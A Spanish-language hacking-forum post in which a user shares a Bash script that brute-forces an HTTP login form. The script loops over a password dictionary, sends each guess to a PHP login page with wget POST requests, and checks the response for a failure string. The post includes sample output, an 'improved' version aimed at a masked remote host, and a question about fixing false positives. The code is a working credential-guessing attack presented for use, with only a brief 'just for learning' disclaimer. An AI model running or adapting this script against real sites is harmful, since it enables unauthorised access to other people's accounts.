elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Bash-wget] Ataque de fuerza bruta HTTP
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Bash-wget] Ataque de fuerza bruta HTTP  (Leído 2,236 veces)
GGZ

Desconectado Desconectado

Mensajes: 144



Ver Perfil
[Bash-wget] Ataque de fuerza bruta HTTP
« en: 2 Octubre 2015, 02:10 am »

Vale aclarar que esto solo lo hago para aprender más y, divertirme un poco.
No para hacer nada malo.

Código
  1. echo "Bruteforce attack!";
  2. USUARIO=$1
  3. DICCIONARIO=$2
  4. LINEAS=`cat $DICCIONARIO | wc -l`
  5. echo -e "User: $USUARIO\nReading: $DICCIONARIO"
  6. i=0;
  7.  
  8.  
  9. while read pass; do
  10.                        i=$(($i+1));
  11. # echo -n "[*] $pass: ";
  12. if [[ "`wget --wait=30 --user-agent=Mozilla/5.0 --save-cookies cookies.txt -qO- --post-data \"nombre_equipo=$USUARIO&pass=$pass\" http://127.0.0.1/php/login.php`" =~ "no coinciden" ]];
  13. then
  14. echo -ne "[*] $i de $(($LINEAS-1)) \r";
  15. else
  16. echo "Found  $pass"; exit;
  17.  
  18. fi
  19. done < $DICCIONARIO
  20.  
  21.  

Salida:

Código
  1. sh brute.sh juan numeros.txt
  2. Bruteforce attack!
  3. User: profe
  4. Reading: numeros.txt
  5. [*] 7 de 293
  6.  





El problema que tengo con esto es que a veces me tira "Falsos positivos" y es por el wget es como que le "apuro" no recibe el paquete o algo,

¿Cómo podría solucionar esto?

Versión mejorada:

Código
  1. echo "Bruteforce attack!";
  2. USUARIO=$1
  3. DICCIONARIO=$2
  4. LINEAS=`cat $DICCIONARIO | wc -l`
  5. echo -e "User: $USUARIO\nReading: $DICCIONARIO"
  6. i=0;
  7.  
  8.  
  9. while read pass; do
  10.    i=$(($i+1));
  11.    #echo -n "[*] $pass: ";
  12.    if [[ "`wget --wait=30 --user-agent=Mozilla/5.0 --save-cookies cookies.txt -qO- --post-data \"nombre_equipo=$USUARIO&pass=$pass\" http://***.***/php/login.php`" =~ "no coinciden" ]];
  13.    then
  14. echo -ne "[*] $i de $(($LINEAS)) \r";
  15.    else
  16. echo "(False positive?) Found $pass";
  17.  
  18.    fi
  19. done < $DICCIONARIO
  20.  


Gracias, Saludos!


« Última modificación: 2 Octubre 2015, 08:19 am por nisteeklod » En línea

LET'S DO STUFF!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ataque fuerza bruta HTTP?
Hacking
1/2lemon 8 12,006 Último mensaje 15 Agosto 2011, 16:42 pm
por CloudswX
Ataque por fuerza bruta en c++ « 1 2 3 »
Programación C/C++
<<<-Basura->>> 22 18,990 Último mensaje 21 Junio 2011, 23:33 pm
por BlackZeroX
Ataque dirección web fuerza bruta?
Hacking
ItaiMegamisama 5 4,771 Último mensaje 18 Abril 2012, 01:02 am
por Breixo
Ataque fuerza bruta con medusa ! BT 5!
Seguridad
32hacking 2 5,044 Último mensaje 29 Mayo 2012, 11:29 am
por el-brujo
Ataque de fuerza bruta con Nmap
Hacking
HA6C 6 6,246 Último mensaje 31 Mayo 2014, 20:39 pm
por HA6C
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines